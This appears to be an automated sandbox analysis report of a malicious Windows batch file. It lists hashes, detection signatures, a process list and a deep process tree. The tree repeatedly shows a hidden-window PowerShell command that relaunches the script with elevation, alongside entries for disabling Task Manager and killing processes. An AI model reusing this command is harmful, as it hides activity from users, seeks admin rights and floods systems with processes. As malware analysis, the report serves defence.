14605d58982699c2f8067cde3109563286dbf18cc233b4ec6036ccb60930403f

Analysis

max time kernel
8s
max time network
68s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
08/09/2024, 06:56

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

custom.bat
Size

4KB
MD5

89f798a5159a32183eb30196d01f1332
SHA1

a9d25c229a0c10acdc45afdb75d67a8b986cd4f0
SHA256

14605d58982699c2f8067cde3109563286dbf18cc233b4ec6036ccb60930403f
SHA512

add8be87d110b65818a30ef77fc3e9e708b810d9e982693525a9ce11d6e1c7f1fda8d3486b80c21a928902705c113a98a069f88fd2274fec152b6aa13f7df1f0
SSDEEP

96:oDmjh7cQGQI9cQITKlQI9uO3DPVqdCgNlWroMu7eQ/Gx6fGfZUX9fQ1ZXkNQI9Iu:oCN7hsTPsdCgVM0emG8bx

Score

8^/10

evasion execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4468	powershell.exe
6488	powershell.exe
1020	powershell.exe
5404	powershell.exe
3404	powershell.exe
5432	powershell.exe
5620	powershell.exe
6228	powershell.exe
3940	powershell.exe
6088	powershell.exe
6464	powershell.exe
2380	powershell.exe
6684	powershell.exe
1204	powershell.exe
5984	powershell.exe
7824	powershell.exe
5252	powershell.exe
2116	powershell.exe
4656	powershell.exe
5508	powershell.exe
2296	powershell.exe
6496	powershell.exe
8808	powershell.exe
5476	powershell.exe
7536	powershell.exe
5068	powershell.exe
2628	powershell.exe
1912	powershell.exe
8	powershell.exe
5628	powershell.exe
5396	powershell.exe
7400	powershell.exe
8056	powershell.exe
5856	powershell.exe
2980	powershell.exe
6112	powershell.exe
2716	powershell.exe
8332	powershell.exe
5012	powershell.exe
4508	powershell.exe
216	powershell.exe
6764	powershell.exe
6416	powershell.exe
8168	powershell.exe
7448	powershell.exe
1260	powershell.exe
5624	powershell.exe
5964	powershell.exe
4400	powershell.exe
7900	powershell.exe
7976	powershell.exe
6588	powershell.exe
3488	powershell.exe
1432	powershell.exe
5368	powershell.exe
6060	powershell.exe
6124	powershell.exe
3288	powershell.exe
8840	powershell.exe
9072	powershell.exe
8600	powershell.exe
4764	powershell.exe
6976	powershell.exe
8116	powershell.exe

Disables Task Manager via registry modification
evasion

Kills process with taskkill 64 IoCs

evasion

pid	Process
7200	taskkill.exe
5360	taskkill.exe
5400	taskkill.exe
4444	taskkill.exe
8680	taskkill.exe
5820	taskkill.exe
8268	taskkill.exe
5308	taskkill.exe
5124	taskkill.exe
6024	taskkill.exe
5796	taskkill.exe
5868	taskkill.exe
5928	taskkill.exe
6948	taskkill.exe
7632	taskkill.exe
5564	taskkill.exe
4332	taskkill.exe
6156	taskkill.exe
5064	taskkill.exe
1364	taskkill.exe
5900	taskkill.exe
7336	taskkill.exe
6804	taskkill.exe
6320	taskkill.exe
1300	taskkill.exe
6488	taskkill.exe
3488	taskkill.exe
6988	taskkill.exe
3120	taskkill.exe
5236	taskkill.exe
7384	taskkill.exe
5280	taskkill.exe
6052	taskkill.exe
7452	taskkill.exe
6428	taskkill.exe
8520	taskkill.exe
8864	taskkill.exe
6604	taskkill.exe
8404	taskkill.exe
8028	taskkill.exe
6320	taskkill.exe
7452	taskkill.exe
7564	taskkill.exe
6640	taskkill.exe
5628	taskkill.exe
5560	taskkill.exe
8020	taskkill.exe
8208	taskkill.exe
7828	taskkill.exe
8000	taskkill.exe
6244	taskkill.exe
2004	taskkill.exe
8612	taskkill.exe
6608	taskkill.exe
5828	taskkill.exe
6932	taskkill.exe
5644	taskkill.exe
7412	taskkill.exe
9036	taskkill.exe
6484	taskkill.exe
7444	taskkill.exe
1884	taskkill.exe
6680	taskkill.exe
8364	taskkill.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5068	powershell.exe
5068	powershell.exe
1228	powershell.exe
1228	powershell.exe
4468	powershell.exe
4468	powershell.exe
1364	powershell.exe
1364	powershell.exe
1260	powershell.exe
1260	powershell.exe
4452	powershell.exe
4452	powershell.exe
2392	powershell.exe
2392	powershell.exe
3320	powershell.exe
3940	powershell.exe
3320	powershell.exe
3940	powershell.exe
3368	powershell.exe
1020	powershell.exe
3368	powershell.exe
1020	powershell.exe
3064	powershell.exe
4736	powershell.exe
3064	powershell.exe
3064	powershell.exe
4736	powershell.exe
4736	powershell.exe
4760	powershell.exe
4760	powershell.exe
3844	powershell.exe
3844	powershell.exe
3844	powershell.exe
1892	powershell.exe
1892	powershell.exe
1892	powershell.exe
2628	powershell.exe
2628	powershell.exe
3404	powershell.exe
3404	powershell.exe
3404	powershell.exe
2628	powershell.exe
1828	powershell.exe
1828	powershell.exe
1828	powershell.exe
4040	powershell.exe
4040	powershell.exe
4040	powershell.exe
4764	powershell.exe
4764	powershell.exe
4764	powershell.exe
4560	powershell.exe
4560	powershell.exe
2116	powershell.exe
2116	powershell.exe
4560	powershell.exe
2116	powershell.exe
1376	powershell.exe
1376	powershell.exe
1376	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
344	powershell.exe

Suspicious use of AdjustPrivilegeToken 26 IoCs

description	pid	Process
Token: SeDebugPrivilege	5068	powershell.exe
Token: SeDebugPrivilege	1228	powershell.exe
Token: SeDebugPrivilege	4468	powershell.exe
Token: SeDebugPrivilege	1364	powershell.exe
Token: SeDebugPrivilege	1260	powershell.exe
Token: SeDebugPrivilege	4452	powershell.exe
Token: SeDebugPrivilege	2392	powershell.exe
Token: SeDebugPrivilege	3320	powershell.exe
Token: SeDebugPrivilege	3940	powershell.exe
Token: SeDebugPrivilege	3368	powershell.exe
Token: SeDebugPrivilege	1020	powershell.exe
Token: SeDebugPrivilege	3064	powershell.exe
Token: SeDebugPrivilege	4736	powershell.exe
Token: SeDebugPrivilege	4760	powershell.exe
Token: SeDebugPrivilege	3844	powershell.exe
Token: SeDebugPrivilege	1892	powershell.exe
Token: SeDebugPrivilege	2628	powershell.exe
Token: SeDebugPrivilege	3404	powershell.exe
Token: SeDebugPrivilege	1828	powershell.exe
Token: SeDebugPrivilege	4040	powershell.exe
Token: SeDebugPrivilege	4764	powershell.exe
Token: SeDebugPrivilege	4560	powershell.exe
Token: SeDebugPrivilege	2116	powershell.exe
Token: SeDebugPrivilege	1376	powershell.exe
Token: SeDebugPrivilege	4656	powershell.exe
Token: SeDebugPrivilege	344	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1488 wrote to memory of 1728	1488	cmd.exe	84
PID 1488 wrote to memory of 1728	1488	cmd.exe	84
PID 1728 wrote to memory of 5068	1728	cmd.exe	86
PID 1728 wrote to memory of 5068	1728	cmd.exe	86
PID 5068 wrote to memory of 4288	5068	powershell.exe	88
PID 5068 wrote to memory of 4288	5068	powershell.exe	88
PID 1728 wrote to memory of 1228	1728	cmd.exe	122
PID 1728 wrote to memory of 1228	1728	cmd.exe	122
PID 4288 wrote to memory of 4468	4288	cmd.exe	91
PID 4288 wrote to memory of 4468	4288	cmd.exe	91
PID 1228 wrote to memory of 4164	1228	powershell.exe	93
PID 1228 wrote to memory of 4164	1228	powershell.exe	93
PID 4468 wrote to memory of 2164	4468	powershell.exe	94
PID 4468 wrote to memory of 2164	4468	powershell.exe	94
PID 4288 wrote to memory of 1364	4288	cmd.exe	96
PID 4288 wrote to memory of 1364	4288	cmd.exe	96
PID 2164 wrote to memory of 1260	2164	cmd.exe	195
PID 2164 wrote to memory of 1260	2164	cmd.exe	195
PID 1364 wrote to memory of 5004	1364	powershell.exe	98
PID 1364 wrote to memory of 5004	1364	powershell.exe	98
PID 1728 wrote to memory of 4452	1728	cmd.exe	99
PID 1728 wrote to memory of 4452	1728	cmd.exe	99
PID 1260 wrote to memory of 2396	1260	powershell.exe	100
PID 1260 wrote to memory of 2396	1260	powershell.exe	100
PID 2164 wrote to memory of 2392	2164	cmd.exe	102
PID 2164 wrote to memory of 2392	2164	cmd.exe	102
PID 4452 wrote to memory of 4356	4452	powershell.exe	103
PID 4452 wrote to memory of 4356	4452	powershell.exe	103
PID 4288 wrote to memory of 3320	4288	cmd.exe	104
PID 4288 wrote to memory of 3320	4288	cmd.exe	104
PID 2392 wrote to memory of 1376	2392	powershell.exe	144
PID 2396 wrote to memory of 3940	2396	cmd.exe	270
PID 2392 wrote to memory of 1376	2392	powershell.exe	144
PID 2396 wrote to memory of 3940	2396	cmd.exe	270
PID 4356 wrote to memory of 1756	4356	csc.exe	287
PID 4356 wrote to memory of 1756	4356	csc.exe	287
PID 3320 wrote to memory of 1632	3320	powershell.exe	108
PID 3320 wrote to memory of 1632	3320	powershell.exe	108
PID 1728 wrote to memory of 624	1728	cmd.exe	109
PID 1728 wrote to memory of 624	1728	cmd.exe	109
PID 3940 wrote to memory of 2768	3940	powershell.exe	110
PID 3940 wrote to memory of 2768	3940	powershell.exe	110
PID 1632 wrote to memory of 3524	1632	csc.exe	112
PID 1632 wrote to memory of 3524	1632	csc.exe	112
PID 1728 wrote to memory of 3368	1728	cmd.exe	255
PID 1728 wrote to memory of 3368	1728	cmd.exe	255
PID 4288 wrote to memory of 3560	4288	cmd.exe	114
PID 4288 wrote to memory of 3560	4288	cmd.exe	114
PID 4288 wrote to memory of 1020	4288	cmd.exe	361
PID 4288 wrote to memory of 1020	4288	cmd.exe	361
PID 2396 wrote to memory of 3064	2396	cmd.exe	202
PID 2396 wrote to memory of 3064	2396	cmd.exe	202
PID 2768 wrote to memory of 4736	2768	cmd.exe	117
PID 2768 wrote to memory of 4736	2768	cmd.exe	117
PID 3368 wrote to memory of 4316	3368	powershell.exe	118
PID 3368 wrote to memory of 4316	3368	powershell.exe	118
PID 1020 wrote to memory of 3268	1020	powershell.exe	119
PID 1020 wrote to memory of 3268	1020	powershell.exe	119
PID 4316 wrote to memory of 5072	4316	csc.exe	454
PID 4316 wrote to memory of 5072	4316	csc.exe	454
PID 3268 wrote to memory of 2716	3268	csc.exe	492
PID 3268 wrote to memory of 2716	3268	csc.exe	492
PID 4288 wrote to memory of 4760	4288	cmd.exe	143
PID 4288 wrote to memory of 4760	4288	cmd.exe	143

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\custom.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1488
- C:\Windows\system32\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1728
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5068
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4288
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4468
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2164
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1260
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:2396
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3940
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        10⤵
        Suspicious use of WriteProcessMemory
        
        PID:2768
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        11⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4736
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        12⤵
        
        PID:1704
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        13⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3404
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        14⤵
        
        PID:3472
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        15⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4764
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        16⤵
        
        PID:2192
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        17⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2116
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        18⤵
        
        PID:5028
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        19⤵
        
        PID:4760
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        19⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4656
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        20⤵
        
        PID:2404
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        21⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5012
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        22⤵
        
        PID:2116
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4508
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        24⤵
        
        PID:4536
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        25⤵
        
        PID:4764
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        25⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1432
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        26⤵
        
        PID:4504
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        27⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1912
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        28⤵
        
        PID:2476
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        29⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        30⤵
        
        PID:4032
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        31⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5368
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        32⤵
        
        PID:5712
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        33⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6060
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        34⤵
        
        PID:5492
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        35⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5856
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        36⤵
        
        PID:5364
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        37⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5624
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        38⤵
        
        PID:5972
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        39⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:216
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        40⤵
        
        PID:1504
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        41⤵
        
        PID:2676
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        42⤵
        
        PID:3816
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        43⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2296
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        44⤵
        
        PID:6032
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        45⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5964
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        46⤵
        
        PID:3384
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        47⤵
        
        PID:5900
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        48⤵
        
        PID:6340
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        49⤵
        
        PID:6752
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        50⤵
        
        PID:3448
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        51⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6464
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        52⤵
        
        PID:6836
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        53⤵
        
        PID:1020
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        54⤵
        
        PID:6192
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        55⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1204
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        56⤵
        
        PID:6964
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        57⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2980
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        58⤵
        
        PID:5776
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        59⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5628
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        60⤵
        
        PID:1828
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        61⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5396
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        62⤵
        
        PID:3688
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        63⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5620
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        64⤵
        
        PID:6356
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        65⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6124
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        66⤵
        
        PID:7324
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        67⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7900
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        68⤵
        
        PID:5464
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        69⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8168
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        70⤵
        
        PID:7340
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        71⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7824
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        72⤵
        
        PID:8160
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        73⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7400
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        74⤵
        
        PID:5268
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        75⤵
        
        PID:7908
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        76⤵
        
        PID:8136
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        77⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5252
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        78⤵
        
        PID:7964
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        79⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2716
        
        C:\Windows\system32\cmd.exe
        
